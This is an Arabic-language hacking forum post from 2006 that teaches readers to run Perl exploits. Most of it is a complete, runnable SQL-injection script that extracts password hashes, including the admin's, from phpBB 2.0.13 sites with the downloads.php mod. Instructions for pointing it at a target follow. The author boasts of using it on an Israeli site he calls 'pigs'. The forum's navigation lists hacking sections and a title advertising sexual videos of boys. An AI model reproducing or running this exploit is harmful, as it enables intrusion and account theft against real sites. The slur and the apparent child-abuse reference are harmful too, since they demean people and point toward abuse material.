Members Login
Username
Password
Login
Remember Me
Lost Account Info?
Main Page
List All Users
Search
Search
Advanced Search
User Details
hacking collection
->
هاكر اختراق المواقع
->
طريقه التعامل مع ثغرات البيرل
Start A New Topic
Reply
Printer Friendly
Post Info
TOPIC: طريقه التعامل مع ثغرات البيرل
so9or
سريه سفيان بن عوف الغامدي للجهاد الكتروني
Status: Offline
Posts: 632
Date:
Fri Jan 27 19:29:44 2006
طريقه التعامل مع ثغرات البيرل
Permalink
Reply
Quote
Printer Friendly
السلام عليكم
اكتب هدا الموضوع المنقول للافادة و للغي الاحتكار الدي لا تخلوا منه اي المنتديات العربية بدون استثناء
للتعامل مع الثغرات بلغة البيرل وكيفيه تشغيلها ...
لتحميل البرنامج ..........
هنـــا
كود:
C:/perl
نفرض عندنا اكسبلويت او ثغره لها عده استخدامات ومن ضمنها بالبيرل..مثال
كود:
#!/usr/bin/perl -w
use IO::Socket;
## Example:
## C:\>phpbb.pl
www.site.com
/phpBB2/ 2
##
## downloads.php mod in phpBB <= 2.0.13
## **********************************
## [~] Connecting...
## [+] Connected!
## [~] Sending Data...
## [~] Data Sent, Waiting for response...
## [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " phpBB <=2.0.13 'downloads.php' Mod\n";
print " Bug found by Axl And CereBrums\n";
print " Coded by CereBrums // 2/4/2005\n";
print " Usage: phpbb.pl <site> <folder> <user_id>\n";
print " e.g.: phpbb.pl
www.site.com
/phpBB2/ 2 \n";
print " [~] <server> - site address\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "\n downloads.php mod in phpBB <= 2.0.13\n";
print " **********************************\n";
print " [~] Connecting...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print " [+] Connected\n";
print " [~] Sending Data...\n";
$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0
\n
\n";
print " [~] Data Sent, Waiting for response...\n";
while ($answer = <$socket>)
{
if ($take == 1) {
$pass = substr($answer,51,32);
print " [+] MD5 Hash for user with id=$user_id is: $pass\n";
$success = 1;
$take = 0;
}
$found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
if ( $found > -1 ) {
$take = 1;
}
}
if ($success==0) {print " [-] Exploit failed\n";}
## EOF ##
/ تضعها الملف داخل BIN
كود:
C:/perl/perl/bin
وتابع المسار بالصوره
وبعدين تفتح الاكسبلويت وتجري التغيرات ((اسم الموقع المستهدف))..
1/ اسم الملف نفسه ((وتقدر تسميه اي اسم ))
2/تضع اسم الموقع المستهدف...وتحفظ التغيرات
نفتح شاشه الدوس...وتخرج من مسارك الحالي
وتدخل لمجلد البيرل للحد BIN
وبعدين تكتب الامر
كود:
perl phpbb.pl
www.site.com
/phpBB2/ 2
طبعا بالبدايه Perl امر ثابت وبعدين اسم املف phpbb.pl
مع ملاحظة التغيرات اللي انت وضعتها بالاكسبلويت من اسم الموقع و المنتدى
امتب الامر واعطيه انتر
وهذا تطبيق على ثغره للــ phpBB 2.0.13 على احد مواقع الخنازير الاسرائيلي
تحياتي
__________________
Page 1 of 1
sorted by
Oldest First
Newest First
Quick Reply
Please log in to post quick replies.
hacking collection
->
هاكر اختراق المواقع
->
طريقه التعامل مع ثغرات البيرل
Subscribe
Jump To:
--- المنتدى الاسلامي والعربي على مذه... ---
هاكر الشبكات
هاكر البريد الالكتروني
هاكر اختراق المواقع
هاكر البال توك والشات
هاكر اختراق الاجهزه
هاكر المواضيع الاسلاميه
هاكر الحمايه
هاكر البريد
اخبار الهاكر العالمين
منتدى تعارف الهاكر المسلم
مكتبه الثغرات
منتدى اهل السنه والجماعه
صيانه الجوال
منتدى اخبار الرسول والصحابه
منتدى قصص الجهاد
هاكر الستايلات
هاكر الهاتف
مكتبه الفيروسات
عالم السيارات
عالم الرياضه
منتدى اركان الاسلام
رمضانيات
قبيله غامد
هاكر الدوس
اداره السيرفرات وحمايتها
منتدى اللينكس واليونكس
منتدى الفو تشوب
منتدى الفلاش والشويتش
تقنيه البلونوث
القران الكريم والحديث الشرف النبوي
مكتبه الصور
لقطات فلاشيه
اهم مشاكل الحاسب
اهم مشاكل الحاسب
اسرار الحاسب الالي
لقطات فيديو مضحكه
اقطات فيديو مرعبه
اقطات فيديو مضحكه
الجامعات الغربيه
الجامعات الغربيه
الجامعات العربيه
تعلم اللغه الانجليزيه
تعلم اي لغه في العالم
مدن العالم العربي
مدن العالم الغربي
مشاهير الناس
المواقع المستهدفه في المستقبل ال...
منتدى تصميم المواقع والمنتديات و...
حمايه المواقع والمنتديات ومجلات ...
هاكر الفيز والبنوك
هاكر الردايو
اسئله الزوار عن الهاكر
اختراق السيرفرات
لقطات فيديو سكس ورعان
اكبر مكتبه هاكر في العالم العربي
ثغرات منتديات الفي بي
شروحات وبرامج صقر غامد
exploits-.-.-.-.-.-.-.
ثغرات البي اتش بي
ثغرات الجورينل والمجموعه الاخباريه
منتدى الاسهـــــــــــم والتجاره
دوره اختراق الاجهزه
دوره اختراق الايميلات
دوره اختراق المواقع
دوره اختراق السيرفرات والشبكات
دوره اختراق الشات والبال توك
اافضل منتديات الهاكر
ثغرات المواقع
ثغرات لغه البايثون
انواع الثغرات وتعريفها
مشاكل الروترز وكيفيه حلها
مشاكل الروترز وكيفيه حلها
فيران تجارب
خدمات مقدمه لكم من صقر غامد
الروت وكل مايتعلق به
الصاله العامه
دروس ويديوهات عن اخترا السيررات
منتدى دورات صقر غامد
منتدى القنص والرحلات البريه
Create your own FREE Forum
Report Abuse